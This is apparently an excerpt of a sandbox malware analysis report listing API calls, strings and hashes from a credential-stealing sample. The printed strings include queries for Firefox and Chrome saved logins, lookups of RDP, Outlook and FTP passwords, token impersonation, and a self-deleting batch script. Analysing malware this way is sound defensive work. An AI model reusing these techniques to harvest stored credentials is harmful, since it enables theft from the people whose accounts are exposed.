                                                • Opcode Fuzzy Hash: 42abdbd7ac9c4f3a616ab5156f2668bfe113570481195958dbe35809a0e690ed
                                                • Instruction Fuzzy Hash: 9451D73291010DFADF11AB91ED41EEEBB7AEF08704F10813AF511B11A1DB799A90DB9C
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 0040880B
                                                • lstrcmpiA.KERNEL32(00415055,?), ref: 00408834
                                                • lstrcmpiA.KERNEL32(00415057,?), ref: 00408851
                                                • FindNextFileA.KERNEL32(?,?,?,?,00000000,?), ref: 004088F8
                                                • FindClose.KERNEL32(?,?,?,?,?,00000000,?), ref: 0040890B
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                                  • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                                  • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                • String ID: *.*$\*.*
                                                • API String ID: 3040542784-1692270452
                                                • Opcode ID: 1bdc7870ad022e8b44980ebbd08f430bd2bb77dcaac7f4fca6e7281557a90ceb
                                                • Instruction ID: d1e9c4525f7b2ad28abf06ab24d8b5a81993df8fef6bfad870924647b3c027b9
                                                • Opcode Fuzzy Hash: 1bdc7870ad022e8b44980ebbd08f430bd2bb77dcaac7f4fca6e7281557a90ceb
                                                • Instruction Fuzzy Hash: A4314171900219AAEF21BF21CD41AED7769AF04344F5084BFB548B50F2DF7D8AD0AA59
                                                APIs
                                                • lstrlenA.KERNEL32(00000000), ref: 0040CD0D
                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CD73
                                                • LocalFree.KERNEL32(00000000), ref: 0040CD9A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CryptDataFreeLocalUnprotectlstrlen
                                                • String ID: full address:s:$password 51:b:$username:s:
                                                • API String ID: 2920030623-2945746679
                                                • Opcode ID: b91112a289d1823270cca11f2669fd3e80525b76d755f2f272bf2885eb7575dd
                                                • Instruction ID: 549b8bfe15727caff0bde4e7f7b0c590c8d751f77b2d72e8e93019e0b323c222
                                                • Opcode Fuzzy Hash: b91112a289d1823270cca11f2669fd3e80525b76d755f2f272bf2885eb7575dd
                                                • Instruction Fuzzy Hash: A8413632810109EAEF11ABE1C986BEEBF75EF44314F10413BE600B11E0D7794A92DBA9
                                                APIs
                                                • CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A80A
                                                • lstrlenW.KERNEL32(00416408,?,?,00000000), ref: 0040A848
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A878
                                                • LocalFree.KERNEL32(00000000), ref: 0040A8AA
                                                • CredFree.ADVAPI32(00000000), ref: 0040A8C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
                                                • String ID: Microsoft_WinInet_*
                                                • API String ID: 3891647360-439986189
                                                • Opcode ID: 5bf2b6e95422933bad89ea4b2930b37d8afdc90123607db899028e35c1490e96
                                                • Instruction ID: 1d55b2d42a3acdf31990dc6a5571002e4569f126bc48c3af6f451ef0ef2cae1b
                                                • Opcode Fuzzy Hash: 5bf2b6e95422933bad89ea4b2930b37d8afdc90123607db899028e35c1490e96
                                                • Instruction Fuzzy Hash: EE314072850318EFEF209F84DD05BEEB7B4AB04304F14807AE540721E1D7B89AD5CB5A
                                                APIs
                                                • lstrlenA.KERNEL32(?), ref: 0040A964
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040AA1C
                                                • LocalFree.KERNEL32(00000000), ref: 0040AA4F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CryptDataFreeLocalUnprotectlstrlen
                                                • String ID:
                                                • API String ID: 2920030623-0
                                                • Opcode ID: 9ebb5da82d9580daab5f6dcce4e5cb029b162b30a380e72508a4c24b0859e133
                                                • Instruction ID: 79cf8318b5822fa2118a75dc7cffc68aed8f1e25df8911532b1ba46c544678e6
                                                • Opcode Fuzzy Hash: 9ebb5da82d9580daab5f6dcce4e5cb029b162b30a380e72508a4c24b0859e133
                                                • Instruction Fuzzy Hash: 4431C7B27002089BEF209E64D9447CEB765EB85360F518433E951A62C0D27C9A92CF5E
                                                APIs
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404372
                                                • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0040438E
                                                • FreeSid.ADVAPI32(?), ref: 004043A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                • String ID:
                                                • API String ID: 3429775523-0
                                                • Opcode ID: dfdde712d65b464cac016b7d8a8f652ff5f99432e6daf67212fb73d3612290a2
                                                • Instruction ID: ccb9488a43648f7677540bf893c3bc3346a108dc4f9de2e3a9ad559ae56b331d
                                                • Opcode Fuzzy Hash: dfdde712d65b464cac016b7d8a8f652ff5f99432e6daf67212fb73d3612290a2
                                                • Instruction Fuzzy Hash: 89114070608248EEEB11CB94DC1EBDE7BF4AB5030DF0980F5D554AA2E2D3B9E508C75A
                                                APIs
                                                • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404269
                                                • LocalFree.KERNEL32(00000000), ref: 0040429D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CryptDataFreeLocalUnprotect
                                                • String ID:
                                                • API String ID: 1561624719-0
                                                • Opcode ID: dc10be99b55b7ac3ef2c85290e9616e512f733d238ff37287e66b294a3da19be
                                                • Instruction ID: e7b80ddee4c2de893b74945ef0147499207a29abacf94d9bc571b3335d8a863c
                                                • Opcode Fuzzy Hash: dc10be99b55b7ac3ef2c85290e9616e512f733d238ff37287e66b294a3da19be
                                                • Instruction Fuzzy Hash: 45112875A00208EBDF118F94DC84BDEBB74FB84750F0484BABA11662D0C778AA90CB58
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
                                                • Instruction ID: e5c8a9ed63948a3fc33c9cd5da8f45d519a938237f1a59f4d152d486bdaad98d
                                                • Opcode Fuzzy Hash: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
                                                • Instruction Fuzzy Hash: 85121E73405A015BE75DCE2ECCC0692B3E3BBD826435BD63DC46AC3A45FE74B61A8648
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 16e1f271713342edd896b7290f6c6c7e68fee66b4334ee17e5165b4637359078
                                                • Instruction ID: 698580cbdec7d4d283496ace6931a8c924f275817c3a7d75ee91b9fbc35eb567
                                                • Opcode Fuzzy Hash: 16e1f271713342edd896b7290f6c6c7e68fee66b4334ee17e5165b4637359078
                                                • Instruction Fuzzy Hash: 8971A137F5053647E7588DAA8C81155E7A2ABC8320B5F837EDD19B7381C974BD2686C0
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.1684799843.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_610000_8WgZHDQckx.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7a8963484dd2edccfe01142f3e14f2035f63a8c6a9a5bb5358b1ed56dadc583d
                                                • Instruction ID: b8cd598ba0b6ae51c68eb93c045517833b36da9003072adc0bc72b341ba9d7e0
                                                • Opcode Fuzzy Hash: 7a8963484dd2edccfe01142f3e14f2035f63a8c6a9a5bb5358b1ed56dadc583d
                                                • Instruction Fuzzy Hash: EA01F270904259ABEF08DF59C1907EDBB76EF45301F28C29AE8651B355D3B8AA80DF80
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
                                                • API String ID: 0-1526611526
                                                • Opcode ID: d1d4def20ccee5a01e1114bf6bef1bc0b4ca275b6b8bce62a98731c495edba67
                                                • Instruction ID: 2f5e765006b63fd4168535b9d64fe58bb021cda9860781546ff6e9663deb65bb
                                                • Opcode Fuzzy Hash: d1d4def20ccee5a01e1114bf6bef1bc0b4ca275b6b8bce62a98731c495edba67
                                                • Instruction Fuzzy Hash: D191F671D00109BADF11AFA2DC56BEEBEB1AF04308F20443BF511B11E2DBB94D959B59
                                                APIs
                                                  • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                                • GetModuleFileNameA.KERNEL32(00000000,00000105,00000104,00000105,00000105), ref: 0040FE25
                                                • GetTempPathA.KERNEL32(00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FE37
                                                • lstrcatA.KERNEL32(00000105,abcd.bat,00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FE4B
                                                • CreateFileA.KERNEL32(00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FE64
                                                • lstrcpyA.KERNEL32(00000105,00000105,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FE77
                                                • StrRChrIA.SHLWAPI(00000105,00000000,0000005C,00000105,00000105,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105), ref: 0040FE83
                                                • lstrcpyA.KERNEL32(00000001,abcd.bat,00000105,00000000,0000005C,00000105,00000105,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105), ref: 0040FE93
                                                • CreateFileA.KERNEL32(00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000105,00000000,0000005C,00000105,00000105,00000105,C0000000,00000003,00000000), ref: 0040FEAA
                                                • lstrlenA.KERNEL32( :ijk del %1 if exist %1 goto ijk del %0 ,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105,00000104,00000105,00000105), ref: 0040FEBA
                                                • CloseHandle.KERNEL32(00000104,00000000, :ijk del %1 if exist %1 goto ijk del %0 ,00000105,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,00000105,00000000,00000105,00000104,00000105), ref: 0040FED1
                                                • wsprintfA.USER32 ref: 0040FEE8
                                                • LoadLibraryA.KERNEL32(shell32.dll), ref: 0040FEF5
                                                • GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 0040FF04
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Createlstrcpy$AddressAllocCloseHandleLibraryLoadLocalModuleNamePathProcTemplstrcatlstrlenwsprintf
                                                • String ID: :ijk del %1 if exist %1 goto ijk del %0 $ "%s" $ShellExecuteA$abcd.bat$open$shell32.dll
                                                • API String ID: 1579379117-2346035512
                                                • Opcode ID: a0cda0ff434185c611cf9080c648d5c3c3fd4a9bce0fce8a69ffecb28466114d
                                                • Instruction ID: 70647179b52a2af869578c22019cc88769e88d17494ea788351c456f045e5e9b
                                                • Opcode Fuzzy Hash: a0cda0ff434185c611cf9080c648d5c3c3fd4a9bce0fce8a69ffecb28466114d
                                                • Instruction Fuzzy Hash: 7A315031F442097AEB2177A28C03FEE7972AB45748F248437B620B51E5DAF94A915A1C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins$ftp.$ftp://$http://$https://$mozsqlite3.dll$sqlite3.dll
                                                • API String ID: 0-3560805513
                                                • Opcode ID: a5273664712210fbb61a8124bbd0481ac73d9e5f527400acd316efa6600ba795
                                                • Instruction ID: c21c2f217904cd2ec998fa265e55fa4182b6c389dea30c275a9b17ac37cbb301
                                                • Opcode Fuzzy Hash: a5273664712210fbb61a8124bbd0481ac73d9e5f527400acd316efa6600ba795
                                                • Instruction Fuzzy Hash: 33511D71940109BADF11ABA5CC06EEE7E75AF04348F10847BB511B01E3DBBD8E90DA5D
                                                APIs
                                                  • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                                • wsprintfA.USER32 ref: 0040AAD5
                                                • wsprintfA.USER32 ref: 0040AAE8
                                                • wsprintfA.USER32 ref: 0040AAFB
                                                • wsprintfA.USER32 ref: 0040AB0E
                                                • wsprintfA.USER32 ref: 0040AB21
                                                • wsprintfA.USER32 ref: 0040AB34
                                                • wsprintfA.USER32 ref: 0040AB47
                                                  • Part of subcall function 0040A94F: lstrlenA.KERNEL32(?), ref: 0040A964
                                                  • Part of subcall function 0040A94F: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040AA1C
                                                  • Part of subcall function 0040A94F: LocalFree.KERNEL32(00000000), ref: 0040AA4F
                                                  • Part of subcall function 004015B3: lstrlenA.KERNEL32(00000000), ref: 004015BF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wsprintf$Locallstrlen$AllocCryptDataFreeUnprotect
                                                • String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
                                                • API String ID: 3846021373-1012938452
                                                • Opcode ID: 46510ed0be41b775551ad4d3ecfc6927bf16cb3893ab1908f2f6dc69ae9be096
                                                • Instruction ID: 38af61a25bba56cbdf77ac4747da24c7cc219a41b90d890c955eb49b7d28db77
                                                • Opcode Fuzzy Hash: 46510ed0be41b775551ad4d3ecfc6927bf16cb3893ab1908f2f6dc69ae9be096
                                                • Instruction Fuzzy Hash: 2F617472C00209BBEF127FA1DD46EEDBA72AF04308F54813AF514741B1D77A5A60EB59
                                                APIs
                                                  • Part of subcall function 0040A0E3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A11C
                                                  • Part of subcall function 0040A0E3: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A125
                                                  • Part of subcall function 0040A12E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A16A
                                                  • Part of subcall function 0040A12E: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A173
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F3B9
                                                • lstrcmpiA.KERNEL32(?,identification), ref: 0040F439
                                                • lstrcmpiA.KERNEL32(?,identitymgr), ref: 0040F44E
                                                • lstrcmpiA.KERNEL32(?,inetcomm server passwords), ref: 0040F471
                                                • lstrcmpiA.KERNEL32(?,outlook account manager passwords), ref: 0040F490
                                                • lstrcmpiA.KERNEL32(?,identities), ref: 0040F4AF
                                                • CoTaskMemFree.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F510
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcmpi$ByteCharFreeMultiTaskWide
                                                • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                                                • API String ID: 636431001-4287852900
                                                • Opcode ID: 5c8af7968dd32e3522306e13d8ff2f22c81db888db247289ec3750830519cf20
                                                • Instruction ID: 7dc3a59528206952cd36e88bf0209e074c77178959b86019fcdee81e9bc15709
                                                • Opcode Fuzzy Hash: 5c8af7968dd32e3522306e13d8ff2f22c81db888db247289ec3750830519cf20
                                                • Instruction Fuzzy Hash: 56413A7184021DAAEF219F50CD42FDA7B79BF05304F0041BAFA0875192DB799AE9DFA4
                                                APIs
                                                • StrStrIA.SHLWAPI(?,explorer.exe,00000002,00000000), ref: 00402BBC
                                                • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,explorer.exe,00000002,00000000), ref: 00402BE0
                                                • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402C0A
                                                • OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402C22
                                                • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402C2F
                                                • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402C50
                                                • CloseHandle.KERNEL32(?), ref: 00402C75
                                                • CloseHandle.KERNEL32(?,?), ref: 00402C7D
                                                • CloseHandle.KERNEL32(?), ref: 00402C87
                                                • Process32Next.KERNEL32(?,00000128), ref: 00402C99
                                                • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00402CA9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
                                                • String ID: explorer.exe
                                                • API String ID: 3144406365-3187896405
                                                • Opcode ID: ebdf3defd56763afb44919605ec2b92ab98fb308ae5d4ffafeb5e4091063880e
                                                • Instruction ID: c963f6e52928c91b7e97de643080fcb6be788e0da40b7acd60b28e10e8a5620a
                                                • Opcode Fuzzy Hash: ebdf3defd56763afb44919605ec2b92ab98fb308ae5d4ffafeb5e4091063880e
                                                • Instruction Fuzzy Hash: E4210D30904119ABEF219B61DE49BEE7AB5BB04344F1080F7E509B21E0D7B89F85DF69
                                                APIs
                                                  • Part of subcall function 00402745: lstrlenA.KERNEL32(?), ref: 00402779
                                                • StrStrIA.SHLWAPI(?,00416560), ref: 0040B87B
                                                • lstrcmpiA.KERNEL32(CONSTRAINT,?), ref: 0040B89D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcmpilstrlen
                                                • String ID: CONSTRAINT$origin_url$password_value$username_value
                                                • API String ID: 3649823140-2401479949
                                                • Opcode ID: 97ad989eda15d304ea17c70c79e3e170fa29adfdd37fe374dbb57d3682f696a7
                                                • Instruction ID: 7f0577275ac2e7a4ff8d66a09d66e6f6d7fad68dc333a691803c72995ff089bc
                                                • Opcode Fuzzy Hash: 97ad989eda15d304ea17c70c79e3e170fa29adfdd37fe374dbb57d3682f696a7
                                                • Instruction Fuzzy Hash: 28119136200108BADF112F25EC419DD3F52AB65398B00C03BF809A41B2E7BDC9D1D79C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: IsRelative$Path$Profile$profiles.ini
                                                • API String ID: 0-4107377610
                                                • Opcode ID: 886725e35773898c68a35a456ea5031dfc93a2f1a767919bf75d21d14989aeea
                                                • Instruction ID: 2f57eea956b09788083e83053daed65e2f25ed7cd0267cdbf1dd2180b3eb9b3f
                                                • Opcode Fuzzy Hash: 886725e35773898c68a35a456ea5031dfc93a2f1a767919bf75d21d14989aeea
                                                • Instruction Fuzzy Hash: A4414131E4014ABADF227BA1CC42EAE7F62AF51354F10857BB410741F3DB7D8E91AA19
                                                APIs
                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004042B9
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004042D1
                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004042E2
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004042F1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$CurrentHandleModuleProcess
